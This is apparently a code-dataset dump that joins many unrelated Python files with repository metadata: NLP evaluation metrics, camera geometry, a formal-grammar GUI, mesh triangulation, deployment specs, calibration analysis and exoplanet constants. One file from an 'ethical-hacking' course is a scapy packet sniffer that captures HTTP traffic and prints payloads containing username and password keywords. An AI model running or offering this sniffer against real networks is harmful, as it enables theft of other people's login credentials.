return re_punc.sub(' ', text) # convert punctuation to spaces
def lower(text):
return text.lower()
return white_space_fix(remove_articles(remove_punc(lower(s)))).split(' ')
def calc_rouge(cands, golds):
rouge_evaluator = language_evaluation.RougeEvaluator(num_parallel_calls=1, tokenization_fn=normalize_answer)
predictions = [' '.join(c) for c in cands]
answers = [' '.join(g) for g in golds]
rouge_result = rouge_evaluator.run_evaluation(predictions, answers)
return rouge_result
def dialogue_evaluation(ori_cands, ori_golds):
assert len(ori_cands) == len(ori_golds), f"num cand: {len(ori_cands)}, num gold: {len(ori_golds)}"
cands = []
golds = []
help_tokenize = lambda x: word_tokenize(x.lower())
for cand, gold in zip(ori_cands, ori_golds):
cands.append(help_tokenize(cand.lower()))
golds.append(help_tokenize(gold.lower()))
cbleu1, cbleu2, cbleu3, cbleu4 = calc_corpus_bleu_new(cands, golds)
sbleu1, sbleu2, sbleu3 = calc_sentence_bleu(cands, golds)
cdiv1, cdiv2 = calc_corpus_distinct(cands)
sdiv1, sdiv2 = calc_sentence_distinct(cands)
cf1 = calc_corpus_f1(cands, golds)
# rouge_result = calc_rouge(cands, golds)
result = {
'cf1': cf1,
'bleu1': cbleu1,
'bleu2': cbleu2,
'bleu3': cbleu3,
'bleu4': cbleu4,
'dist1': cdiv1,
'dist2': cdiv2,
}
# result.update(rouge_result)
result = {k: round(100 * v, 6) for k, v in result.items()}
return result
def file_dialogue_evaluation(cand_file, gold_file):
print(f"cand file: {cand_file}, gold file: {gold_file}")
cands = []
golds = []
with open(cand_file, 'r', encoding='utf-8') as f:
for line in f:
cands.append(line.strip())
with open(gold_file, 'r', encoding='utf-8') as f:
for line in f:
golds.append(line.strip())
results = dialogue_evaluation(cands, golds)
print(results)
if __name__ == "__main__":
cand_file = sys.argv[1]
gold_file = sys.argv[2]
file_dialogue_evaluation(cand_file, gold_file)
| 35.465517 | 113 | 0.653986 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,050 | 0.127613 |
1ffa89e42119c66f0b38cae0145de37c497cd8de
| 896 |
py
|
Python
|
06_packet_sniffer/packet_sniffer.py
|
maks-nurgazy/ethical-hacking
|
0f9f2b943b5afa9b11251270e4672e0965ec1769
|
[
"MIT"
] | null | null | null |
06_packet_sniffer/packet_sniffer.py
|
maks-nurgazy/ethical-hacking
|
0f9f2b943b5afa9b11251270e4672e0965ec1769
|
[
"MIT"
] | null | null | null |
06_packet_sniffer/packet_sniffer.py
|
maks-nurgazy/ethical-hacking
|
0f9f2b943b5afa9b11251270e4672e0965ec1769
|
[
"MIT"
] | null | null | null |
import scapy.all as scapy
from scapy.layers import http
def sniff(interface):
scapy.sniff(iface=interface, store=False, prn=process_sniffed_packed)
def get_url(packet):
return (packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path).decode("utf-8")
def get_login_info(packet):
if packet.haslayer(scapy.Raw):
load = packet[scapy.Raw].load.decode("utf-8")
keywords = ["uname", "username", "user", "login", "password", "pass"]
for keyword in keywords:
if keyword in load:
return load
def process_sniffed_packed(packet):
if packet.haslayer(http.HTTPRequest):
url = get_url(packet)
if url:
print("[+] HTTP Request >> " + url)
login_info = get_login_info(packet)
if login_info:
print("\n\n[+] Possible username/password > " + login_info + "\n\n")
sniff("eth0")
| 27.151515 | 90 | 0.631696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 133 | 0.148438 |
1ffb6e885c207ea205ef242e09f2cabe5866ad26
| 3,705 |
py
|
Python
|
cameraToWorld.py
|
blguweb/Tap-Tap-computer
|
4e2007b5a31e6d5f902b1e3ca58206870331ef07
|
[
"MIT"
] | null | null | null |
cameraToWorld.py
|
blguweb/Tap-Tap-computer
|
4e2007b5a31e6d5f902b1e3ca58206870331ef07
|
[
"MIT"
] | null | null | null |
cameraToWorld.py
|
blguweb/Tap-Tap-computer
|
4e2007b5a31e6d5f902b1e3ca58206870331ef07
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from typing import NoReturn
import cv2 as cv
import numpy as np
from numpy import mat
import xml.etree.ElementTree as ET
import math
camera_angle = 315
camera_intrinsic = {
# # 相机内参矩阵
# 相机内参矩阵 matlab 求得
"camera_matrix": [871.086328150675740,0.0, 314.319098669115306,
0.0, 868.410697770935144, 254.110678266434348,
0.0, 0.0, 1.0],
# 畸变系数
"camera_distortion": [0.182040359674805,-0.564946010535902,0.001566542339394, 0.003396709692351,0.000000000000000 ],
# # # 旋转矢量
"camera_rvec": [-1.57079633, 0.0, 0.0],
# 平移矢量
# "camera_tvec": ['-29.046143504451425', '1126.526303382564', '736.155158603123']
"camera_tvec": [0.0, 0.0, 0.0],
# # 旋转矩阵
# "rvec_matrix": [[1.0,0.0,0.0],
# [0.0,0.0,-1.0],
# [0.0,1.0,0.0]]
}
class CtoWorld(object):
def __init__(self):
self.image_size = (640 , 480)
self.rvec = np.asarray(camera_intrinsic['camera_rvec'])
self.cam_mat = np.asarray(camera_intrinsic['camera_matrix'])
self.tvec = np.asarray(camera_intrinsic['camera_tvec'])
self.cam_dist = np.asarray(camera_intrinsic['camera_distortion'])
self.rot_mat = mat(cv.Rodrigues(self.rvec)[0])
# self.cam_mat_new, roi = cv.getOptimalNewCameraMatrix(self.cam_mat, self.cam_dist, self.image_size, 1, self.image_size)
# self.roi = np.array(roi)
def pixel_c(self,points,depth):
# 像素 -> 相机
p= (depth*np.asarray(points)).T
p = mat(p, np.float).reshape((3,1))
self.cam_mat = mat(self.cam_mat, np.float).reshape((3, 3))
ca_points =np.dot( np.linalg.inv(self.cam_mat),p)
print("c",ca_points)
return ca_points
def c_w(self,points):
revc = mat(self.rot_mat, np.float).reshape((3, 3))
T = mat(self.tvec, np.float).reshape((3, 1))
w_points = np.dot(revc,points)+T
print("w",w_points)
return w_points
def imu_get(self,message):
mess = message.split()
z = float(mess[0])
x = float(mess[1])
y = float(mess[2])
print("3",x,y,z)
return x,y,z
def unit_vector_get(self,vx,vy,vz):
# 摄像头与北的夹角
c_to_n = camera_angle
# 计算角度
# 因为是西 所以是负数
# xita 对于 -y 顺时针为正 逆时针为负c_to_n - (-vz)
xita = c_to_n + vz
fai = vx + 90
print("fai",fai,xita)
# 方向单位向量
uz = math.cos(math.radians(fai))
print("uz",uz)
ux = - math.sin(math.radians(xita)) * math.sin(math.radians(fai))
uy = - math.cos(math.radians(xita)) * math.sin(math.radians(fai))
vec = [ux,uy,uz]
print("vtype",vec)
return vec
def target_not(self,unot,uvector):
# 需要知道在哪一个面碰壁
# 比如y
tx = uvector[0] * (-unot[1]) / uvector[1] + unot[0]
tz = uvector[2] * (-unot[1]) / uvector[1] + unot[2]
return tx,tz
if __name__ == '__main__':
mctoworld = CtoWorld() # 生产矫正对象
# 像素坐标 x,y,depth
points = [355,218,1]
depth = 1540
# 相机坐标
camera_points = mctoworld.pixel_c(points,depth)
w_points = mctoworld.c_w(camera_points)
# IMU
mes = "-42.60 6.91 0.67"
x,y,z = mctoworld.imu_get(mes)
mvector = mctoworld.unit_vector_get(x,y,z)
tx,tz = mctoworld.target_not(w_points,mvector)
print("tx: ",tx)
print("tz: ",tz)
if -2000 < tx < -1380 and 840 < tz < 1300:
print("true")
else:
print("false")
| 33.080357 | 129 | 0.550877 | 2,268 | 0.580794 | 0 | 0 | 0 | 0 | 0 | 0 | 993 | 0.254289 |
1ffb6f2d2eca765ba18ee0ccc397d70767e06533
| 5,004 |
py
|
Python
|
compilers/labs/lab2/gui.py
|
vampy/university
|
9496cb63594dcf1cc2cec8650b8eee603f85fdab
|
[
"MIT"
] | 6 |
2015-06-22T19:43:13.000Z
|
2019-07-15T18:08:41.000Z
|
compilers/labs/lab2/gui.py
|
vampy/university
|
9496cb63594dcf1cc2cec8650b8eee603f85fdab
|
[
"MIT"
] | null | null | null |
compilers/labs/lab2/gui.py
|
vampy/university
|
9496cb63594dcf1cc2cec8650b8eee603f85fdab
|
[
"MIT"
] | 1 |
2015-09-26T09:01:54.000Z
|
2015-09-26T09:01:54.000Z
|
#!/usr/bin/python
import os
from log import Log
from enum import IntEnum, unique
from grammar import Grammar
from automaton import FiniteAutomaton
@unique
class Command(IntEnum):
GRAMMAR_READ = 1
GRAMMAR_DISPLAY = 2
GRAMMAR_VERIFY = 3
AUTOMATON_READ = 4
AUTOMATON_DISPLAY = 5
CONVERT_RG_TO_FA = 6
CONVERT_FA_TO_RG = 7
HELP = 99
QUIT = 0
class Gui:
@staticmethod
def run():
Log.info('Running...')
try:
grammar = Grammar.from_lines(Gui.get_lines_filename('grammar.rg'))
print(grammar, grammar.is_regular(), grammar.is_left, grammar.is_right, end='\n' * 2)
print(grammar.to_finite_automaton(), end='\n' * 2)
except Exception as e:
Log.error(grammar.error_message)
Log.error(str(e))
try:
automaton = FiniteAutomaton.from_lines(Gui.get_lines_filename('automata.fa'))
print(automaton, end='\n' * 2)
print(automaton.to_regular_grammar())
except Exception as e:
Log.error(str(e))
Gui.print_help_menu()
grammar, automaton = None, None
while True:
try:
command = Command(Gui.get_int('>>> '))
if command is Command.QUIT:
print('\n\nQuitting...')
break
elif command is Command.HELP:
Gui.print_help_menu()
elif command is Command.GRAMMAR_READ:
filename = Gui.get_string('Filename = ')
grammar = Grammar.from_lines(Gui.get_lines_filename(filename))
Log.success('Success')
elif command is Command.GRAMMAR_DISPLAY or command is Command.CONVERT_RG_TO_FA:
if grammar is None:
raise Exception('Please read a RG')
if command is Command.GRAMMAR_DISPLAY:
print(grammar)
else:
print(grammar.to_finite_automaton())
Log.success('Success')
elif command is Command.GRAMMAR_VERIFY:
if grammar is None:
raise Exception('Please read a RG')
is_regular = grammar.is_regular()
if is_regular:
Log.success('Grammar is {0} regular'.format('left' if grammar.is_left else 'right'))
else:
Log.error('Grammar is NOT regular')
elif command is Command.AUTOMATON_READ:
filename = Gui.get_string('Filename = ')
automaton = FiniteAutomaton.from_lines(Gui.get_lines_filename(filename))
Log.success('Success')
elif command is Command.AUTOMATON_DISPLAY or command is Command.CONVERT_FA_TO_RG:
if automaton is None:
raise Exception('Please read a FA')
if command is Command.AUTOMATON_DISPLAY:
print(automaton)
else:
print(automaton.to_regular_grammar())
Log.success('Success')
else:
print(command)
except Exception as e:
Log.error(str(e))
@staticmethod
def get_lines_filename(filename):
if not os.path.exists(filename):
raise FileExistsError('The file "{0}" does not exist'.format(filename))
with open(filename, 'r') as f:
lines = f.readlines()
return lines
@staticmethod
def print_help_menu():
print('{0}. Read grammar'.format(Command.GRAMMAR_READ))
print('{0}. Display grammar'.format(Command.GRAMMAR_DISPLAY))
print('{0}. Verify grammar'.format(Command.GRAMMAR_VERIFY), end='\n' * 2)
print('{0}. Read FA'.format(Command.AUTOMATON_READ))
print('{0}. Display FA'.format(Command.AUTOMATON_DISPLAY), end='\n' * 2)
print('{0}. Convert RG to FA'.format(Command.CONVERT_RG_TO_FA))
print('{0}. Convert RG to RG'.format(Command.CONVERT_FA_TO_RG), end='\n' * 2)
print('{0}. Help menu'.format(Command.HELP))
print('{0}. Quit'.format(Command.QUIT), end='\n' * 2)
@staticmethod
def get_int(prompt, prompt_retry='Retry again..', is_retry=False):
if is_retry:
print(prompt_retry)
try:
return int(Gui.get_string(prompt))
except ValueError:
return Gui.get_int(prompt, prompt_retry, True)
@staticmethod
def get_string(prompt):
try:
# Do not allow empty input
user_input = input(prompt)
if not user_input:
return Gui.get_string(prompt)
return user_input
except EOFError: # Ctrl-D
return Command.QUIT
except KeyboardInterrupt: # Ctrl-C
return Command.QUIT
| 33.139073 | 108 | 0.552158 | 4,843 | 0.967826 | 0 | 0 | 4,812 | 0.961631 | 0 | 0 | 539 | 0.107714 |
1ffbe3042328109603927698807569c875283801
| 180 |
py
|
Python
|
atividades/ex31.py
|
Fleen66/Python_exercises
|
fd05fdf1181da833a1a1bc9f4a476afc8f467977
|
[
"MIT"
] | null | null | null |
atividades/ex31.py
|
Fleen66/Python_exercises
|
fd05fdf1181da833a1a1bc9f4a476afc8f467977
|
[
"MIT"
] | null | null | null |
atividades/ex31.py
|
Fleen66/Python_exercises
|
fd05fdf1181da833a1a1bc9f4a476afc8f467977
|
[
"MIT"
] | null | null | null |
distancia = int(input('Digite a distancia de sua viagem: '))
if distancia <= 200:
preco = distancia * 0.50
print(preco)
else:
preco = distancia * 0.40
print(preco)
| 22.5 | 60 | 0.644444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 36 | 0.2 |
1ffc42584a05c85ceb4b5e649094a2917f366627
| 7,947 |
py
|
Python
|
src/triangle.py
|
songrun/VectorSkinning
|
a19dff78215b51d824adcd39c7dcdf8dc78ec617
|
[
"Apache-2.0"
] | 18 |
2015-04-29T20:54:15.000Z
|
2021-12-13T17:48:05.000Z
|
src/triangle.py
|
songrun/VectorSkinning
|
a19dff78215b51d824adcd39c7dcdf8dc78ec617
|
[
"Apache-2.0"
] | null | null | null |
src/triangle.py
|
songrun/VectorSkinning
|
a19dff78215b51d824adcd39c7dcdf8dc78ec617
|
[
"Apache-2.0"
] | 8 |
2017-04-23T17:52:13.000Z
|
2022-03-14T11:01:56.000Z
|
import sys
import subprocess
import os
from numpy import asarray
#triangle_path = os.path.join( "C:\\Users\\Mai\\Dropbox\\Research\\Deformation\\src\\py\\triangle", "triangle.exe")
triangle_path = os.path.join( os.path.dirname( __file__ ), "triangle", "triangle" )
if not os.path.exists( triangle_path ):
raise ImportError, "Triangle not found: " + triangle_path
def triangles_for_points( points, boundary_edges = None ):
'''
Given a sequence of 2D points 'points' and
optional sequence of 2-tuples of indices into 'points' 'boundary_edges',
returns a triangulation of the points as a sequence
of length-three tuples ( i, j, k ) where i,j,k are
the indices of the triangle's vertices in 'points'.
If 'boundary_edges' is not specified or is an empty sequence,
a convex triangulation will be returned.
Otherwise, 'boundary_edges' indicates the boundaries of the desired mesh.
'''
import os, subprocess
### http://www.cs.cmu.edu/~quake/triangle.switch.html
## -q Quality mesh generation with no angles smaller than 20 degrees. An alternate minimum angle may be specified after the `q'.
## -a Imposes a maximum triangle area constraint. A fixed area constraint (that applies to every triangle) may be specified after the `a', or varying area constraints may be read from a .poly file or .area file.
## -g Outputs the mesh to an Object File Format (.off) file, suitable for viewing with the Geometry Center's Geomview package.
options = [ '-q', '-a100', '-g' ]
# options = [ '-q' ]
if boundary_edges is None: boundary_edges = []
if len( boundary_edges ) == 0:
input_path = write_node_file( points )
print triangle_path, input_path
subprocess.call( [ triangle_path ] + options + [ input_path ] )
else:
input_path = write_poly_file( points, boundary_edges )
## -p Triangulates a Planar Straight Line Graph (.poly file).
subprocess.call( [ triangle_path ] + options + [ '-p', input_path ] )
ele_path = os.path.splitext( input_path )[0] + '.1.ele'
triangles = read_ele_file( ele_path )
node_path = os.path.splitext( input_path )[0] + '.1.node'
points = read_node_file( node_path)
#os.remove( poly_path )
#os.remove( ele_path )
return points, triangles
def __write_node_portion_of_file_to_object( obj, points, boundary_indices = set() ):
'''
Given an object 'obj' that can be passed as a parameter to
print >> 'obj', "Something to print",
a sequence of 2D points 'points', and
an optional set of indices in 'points' that are to be considered 'boundary_indices',
writes the '.node' portion of the file suitable for passing to 'triangle'
( http://www.cs.cmu.edu/~quake/triangle.node.html ).
Does not return a value.
'''
## 'points' must be a non-empty sequence of x,y positions.
points = asarray( points )
assert points.shape == ( len( points ), 2 )
assert points.shape[0] > 0
## The elements in 'boundary_indices' must be a subset of indices into 'points'.
## NOTE: set.issuperset() returns True if the sets are the same.
assert set(range(len(points))).issuperset( boundary_indices )
print >> obj, '## The vertices'
print >> obj, len( points ), 2, 0, len( boundary_indices )
for i, ( x, y ) in enumerate( points ):
print >> obj, i, x, y, ( 1 if i in boundary_indices else 0 )
def write_poly_file( points, boundary_edges ):
'''
Given a sequence of 2D points 'points'
and a potentially empty sequence 'boundary_edges' of
2-tuples of indices into 'points',
writes a '.poly' file suitable for passing to 'triangle'
( http://www.cs.cmu.edu/~quake/triangle.poly.html )
and returns the path to the '.poly' file.
'''
## Each of the two elements of each 2-tuple in 'boundary_edges'
## must be indices into 'points'.
assert all([ i >= 0 and i < len( points ) and j >= 0 and j < len( points ) and i != j for i,j in boundary_edges ])
## They must be unique and undirected.
assert len( boundary_edges ) == len( set([ frozenset( edge ) for edge in boundary_edges ]) )
## Create 'boundary_indices', the set of all indices that appear
## in 'boundary_edges'.
boundary_indices = frozenset( asarray( boundary_edges ).ravel() )
import tempfile
## This only works on Python 2.6+
#poly_file = tempfile.NamedTemporaryFile( suffix = '.poly', delete = False )
#poly_file_name = poly_file.name
poly_file, poly_file_name = tempfile.mkstemp( suffix = '.poly' )
poly_file = os.fdopen( poly_file, 'w' )
print >> poly_file, '## Written by triangle.py'
__write_node_portion_of_file_to_object( poly_file, points, boundary_indices )
print >> poly_file, ''
print >> poly_file, '## The segments'
print >> poly_file, len( boundary_edges ), len( boundary_edges )
for i, ( e0, e1 ) in enumerate( boundary_edges ):
print >> poly_file, i, e0, e1, 1
print >> poly_file, ''
print >> poly_file, '## The holes'
print >> poly_file, 0
poly_file.close()
return poly_file_name
def write_node_file( points ):
'''
Given a sequence of 2D points 'points',
writes a '.node' file suitable for passing to 'triangle'
( http://www.cs.cmu.edu/~quake/triangle.node.html )
and returns the path to the '.node' file.
'''
import tempfile
## This only works on Python 2.6+
#node_file = tempfile.NamedTemporaryFile( suffix = '.node', delete = False )
#node_file_name = node_file.name
node_file, node_file_name = tempfile.mkstemp( suffix = '.node' )
node_file = os.fdopen( node_file, 'w' )
print >> node_file, '## Written by triangle.py'
__write_node_portion_of_file_to_object( node_file, points )
node_file.close()
return node_file_name
def read_ele_file( ele_path ):
'''
Reads a '.ele' file generated by 'triangle'.
Returns the list of triangles as indices into the
corresponding '.node' file.
'''
ele_file = open( ele_path )
## Ignore top line.
ele_file.readline()
triangles = []
for line in ele_file:
sline = line.strip().split()
if len( sline ) == 0: continue
if sline[0][0] == '#': continue
triangles.append( tuple([ int( index ) for index in sline[1:4] ]) )
assert len( triangles[-1] ) == 3
ele_file.close()
return triangles
def read_node_file( node_path ):
'''
Reads a '.node' file generated by 'triangle'.
Returns the list of points as tuples.
'''
node_file = open( node_path )
## Ignore top line.
node_file.readline()
triangles = []
for line in node_file:
sline = line.strip().split()
if len( sline ) == 0: continue
if sline[0][0] == '#': continue
triangles.append( tuple([ float( index ) for index in sline[1:4] ]) )
#assert len( triangles[-1] ) == 3
node_file.close()
return triangles
# def main():
# pts = [ ( -1,-1 ), ( 1, -1 ), ( 1, 1 ), ( -1, 1 ), ( 0, 0 ) ]
# edges = [ ( 0, 1 ), ( 1, 2 ), ( 2, 3 ), ( 3, 0 ) ]
#
# ## This isn't very good, because 4 random points may be self-intersecting
# ## when viewed as a polyline loop.
# #import random
# #pts = [ ( random.uniform( -1, 1 ), random.uniform( -1, 1 ) ) for i in xrange(4) ]
#
# print 'pts:', pts
#
# points, triangles = triangles_for_points( pts )
# print 'points (no boundary edges):', points
# print 'triangles (no boundary edges):', triangles
#
# print 'width edges:', edges
# points, triangles = triangles_for_points( pts, edges )
# print 'points (with edges):', points
# print 'triangles (with edges):', triangles
#
# if __name__ == '__main__': main()
| 36.287671 | 215 | 0.630804 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 4,219 | 0.530892 |
1ffe75b4736bb2daa16ad12967f532235a2b0677
| 4,559 |
py
|
Python
|
edbdeploy/spec/baremetal.py
|
vincentp7212/postgres-deployment
|
ea0ed0e06a4eb99cc28600398eddcf2320778113
|
[
"BSD-3-Clause"
] | 58 |
2020-02-24T21:02:50.000Z
|
2022-03-28T14:51:56.000Z
|
edbdeploy/spec/baremetal.py
|
vincentp7212/postgres-deployment
|
ea0ed0e06a4eb99cc28600398eddcf2320778113
|
[
"BSD-3-Clause"
] | 108 |
2020-09-18T12:53:44.000Z
|
2022-02-02T09:02:31.000Z
|
edbdeploy/spec/baremetal.py
|
vincentp7212/postgres-deployment
|
ea0ed0e06a4eb99cc28600398eddcf2320778113
|
[
"BSD-3-Clause"
] | 47 |
2020-03-04T15:51:01.000Z
|
2022-02-27T13:48:05.000Z
|
from . import SpecValidator
BaremetalSpec = {
'EDB-RA-1': {
'ssh_user': SpecValidator(type='string', default=None),
'pg_data': SpecValidator(type='string', default=None),
'pg_wal': SpecValidator(type='string', default=None),
'postgres_server_1': {
'name': SpecValidator(type='string', default='pg1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'pem_server_1': {
'name': SpecValidator(type='string', default='pem1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'backup_server_1': {
'name': SpecValidator(type='string', default='backup1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
}
},
'EDB-RA-2': {
'ssh_user': SpecValidator(type='string', default=None),
'pg_data': SpecValidator(type='string', default=None),
'pg_wal': SpecValidator(type='string', default=None),
'postgres_server_1': {
'name': SpecValidator(type='string', default='pg1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'postgres_server_2': {
'name': SpecValidator(type='string', default='pg2'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'postgres_server_3': {
'name': SpecValidator(type='string', default='pg3'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'pem_server_1': {
'name': SpecValidator(type='string', default='pem1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'backup_server_1': {
'name': SpecValidator(type='string', default='backup1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
}
},
'EDB-RA-3': {
'ssh_user': SpecValidator(type='string', default=None),
'pg_data': SpecValidator(type='string', default=None),
'pg_wal': SpecValidator(type='string', default=None),
'postgres_server_1': {
'name': SpecValidator(type='string', default='pg1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'postgres_server_2': {
'name': SpecValidator(type='string', default='pg2'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'postgres_server_3': {
'name': SpecValidator(type='string', default='pg3'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'pooler_server_1': {
'name': SpecValidator(type='string', default='pooler1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'pooler_server_2': {
'name': SpecValidator(type='string', default='pooler2'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'pooler_server_3': {
'name': SpecValidator(type='string', default='pooler3'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'pem_server_1': {
'name': SpecValidator(type='string', default='pem1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
},
'backup_server_1': {
'name': SpecValidator(type='string', default='backup1'),
'public_ip': SpecValidator(type='ipv4', default=None),
'private_ip': SpecValidator(type='ipv4', default=None),
}
}
}
| 45.59 | 68 | 0.573591 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,351 | 0.296337 |
1ffec07dcf5a4c57c0d689934f15fff735336375
| 2,382 |
py
|
Python
|
ml-scripts/ss_calib/scripts/ss_charge_cali.py
|
YashengFu/exo-200_scripts
|
d33a1a2eeda5f072409656b96e8730f2de53ee0b
|
[
"MIT"
] | null | null | null |
ml-scripts/ss_calib/scripts/ss_charge_cali.py
|
YashengFu/exo-200_scripts
|
d33a1a2eeda5f072409656b96e8730f2de53ee0b
|
[
"MIT"
] | null | null | null |
ml-scripts/ss_calib/scripts/ss_charge_cali.py
|
YashengFu/exo-200_scripts
|
d33a1a2eeda5f072409656b96e8730f2de53ee0b
|
[
"MIT"
] | null | null | null |
import numpy as np
import time
import argparse
import pandas as pd
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
from scipy import special
from tqdm import tqdm
from scipy.optimize import curve_fit
from utils.build_hist import build_hist
class SS_Charge:
"""
read calibration data and use SS event get calibrate constants
"""
def __init__(self,file_path,input_files):
self.file_path = file_path
self.input_files = input_files
self.df_data = self.get_data(input_files)
self.cluster_energy = []
def get_data(self,input_files):
df_all =[]
file_index = 0
for index in range(len(input_files)):
df = pd.read_hdf(self.file_path+input_files[index])
df = df.reset_index()
df['entry'] = df['entry']+file_index
df = df.set_index(["entry"])
file_index+= len(df['label'])
df_all.append(df)
df_total = pd.concat(df_all)
return df_total
def select_ss_data(self,ss_type=1):
c_energy = []
select_data = self.df_data[self.df_data['ss_type']==1]
print('%s events are %d'%(ss_type,select_data.shape[0]))
for index in tqdm(set(select_data.index.get_level_values('entry').values), mininterval=1, leave=False):
variables = [float(i) for i in select_data["report"][index].split()]
c_energy.append(variables[-1])
self.cluster_energy=c_energy
def check_data(self):
hist_data,bin_edges,patches = plt.hist(self.cluster_energy,bins=np.arange(0,3001,6),label='cluster_energy',histtype='step',alpha=0.9,linewidth=1,edgecolor='blue',density=False)
bin_centers = 0.5*(bin_edges[1:] + bin_edges[:-1])
bin_centers = np.array(bin_centers)
return bin_centers, hist_data
def root_fit(self):
c_hist = build_hist(self.cluster_energy)
return c_hist
if __name__ == "__main__":
start_time = time.time()
test_object = SS_Charge("/dybfs2/nEXO/fuys/EXO-200/shape_agreement/2019_0vbb/Phase1/fv_162_10_182_173_3d0.6/data/ml_rec_data/",["run_6255_ml.h5"])
test_object.select_ss_data(1)
bin_centers, hist_data = test_object.check_data()
bin_centers, hist_data, bin_centers_mask, c_energy_mask, popt, perr = test_object.fit_data()
print(f"time costs: {(time.time() -start_time)/60} min")
| 38.419355 | 184 | 0.673804 | 1,661 | 0.697313 | 0 | 0 | 0 | 0 | 0 | 0 | 358 | 0.150294 |
1fff4ed247e76eafdf9461ae3d7ab7dc88f2b73c
| 97,747 |
py
|
Python
|
ExoplanetPocketknife.py
|
ScottHull/Exoplanet-Pocketknife
|
15b49ff3612adc3b31a78c27379fb8b2f47c6c8f
|
[
"CC0-1.0"
] | null | null | null |
ExoplanetPocketknife.py
|
ScottHull/Exoplanet-Pocketknife
|
15b49ff3612adc3b31a78c27379fb8b2f47c6c8f
|
[
"CC0-1.0"
] | null | null | null |
ExoplanetPocketknife.py
|
ScottHull/Exoplanet-Pocketknife
|
15b49ff3612adc3b31a78c27379fb8b2f47c6c8f
|
[
"CC0-1.0"
] | null | null | null |
# python /usr/bin/env/python
# /// The Exoplanet Pocketknife
# /// Scott D. Hull, The Ohio State University 2015-2017
# /// All usage must include proper citation and a link to the Github repository
# /// https://github.com/ScottHull/Exoplanet-Pocketknife
import os, csv, time, sys, shutil, subprocess
from threading import Timer
from math import *
import pandas as pd
import matplotlib.pyplot as plt
from scipy import integrate as inte
import numpy as np
import bisect
bsp_run = False
morb_run = False
gravity = 9.8
# plate_thickness = 10.0 # This is in km!
plate_thickness = 10 * 1000 # This is in m!
na_atwt = 22.98976928
mg_atwt = 24.305
al_atwt = 26.9815386
si_atwt = 28.0855
ca_atwt = 40.078
ti_atwt = 47.867
cr_atwt = 51.9961
fe_atwt = 55.845
ni_atwt = 58.6934
na2o_molwt = 61.9785
mgo_molwt = 40.3040
al2o3_molwt = 101.9601
sio2_molwt = 60.0835
cao_molwt = 56.0770
tio2_molwt = 79.8650
cr2o3_molwt = 151.9892
feo_molwt = 71.8440
nio_molwt = 74.6924
fe2o3_molwt = 159.687
num_na2o_cations = 2
num_mgo_cations = 1
num_al2o3_cations = 2
num_sio2_cations = 1
num_cao_cations = 1
num_tio2_cations = 1
num_cr2o3_cations = 2
num_feo_cations = 1
num_nio_cations = 1
num_fe2o3_cations = 2
asplund_na = 1479108.388
asplund_mg = 33884415.61
asplund_al = 2344228.815
asplund_si = 32359365.69
asplund_ca = 2041737.945
asplund_ti = 79432.82347
asplund_cr = 436515.8322
asplund_fe = 28183829.31
asplund_ni = 1698243.652
asplund_sivsfe = asplund_si / asplund_fe
asplund_navsfe = asplund_na / asplund_fe
mcd_earth_fe = 29.6738223341739
mcd_earth_na = 0.40545783900173
mcd_earth_mg = 32.812015232308
mcd_earth_al = 3.05167459380979
mcd_earth_si = 29.6859892035662
mcd_earth_ca = 2.20951970229211
mcd_earth_ni = 1.60579436264263
mcd_earth_ti = 0.0876307681103416
mcd_earth_cr = 0.468095964095391
mc_earth_ni = 1.60579436264263
mcd_sivsfe = mcd_earth_si / mcd_earth_fe
mcd_navsfe = mcd_earth_na / mcd_earth_fe
adjust_si = mcd_sivsfe / asplund_sivsfe
adjust_na = mcd_navsfe / asplund_navsfe
modelearth_mgo = 11.84409812845
gale_mgo = 7.65154964069009
mgo_fix = gale_mgo / modelearth_mgo
depth_trans_zone = [0, 6, 19.7, 28.9, 36.4, 43.88, 51.34, 58.81, 66.36, 73.94, 81.5, 88.97, 96.45, 103.93, 111.41,
118.92, 126.47, 134.01, 141.55, 149.09, 156.64, 164.18, 171.72, 179.27, 186.79, 194.27, 201.75,
209.23, 216.71, 224.09, 231.4, 238.7, 246.01, 253.31, 260.62, 267.9, 275.16, 282.42, 289.68,
296.94, 304.19, 311.41, 318.44, 325.47, 332.5, 339.53, 346.56, 353.59, 360.62, 367.66, 374.69,
381.72, 388.75, 395.78, 402.78, 409.72, 416.67, 423.61, 430.56, 437.5, 444.44, 451.32, 457.89,
464.47, 471.05, 477.63, 484.21, 490.79, 497.37, 503.75, 510, 516.25, 522.5, 528.75, 535, 541.25,
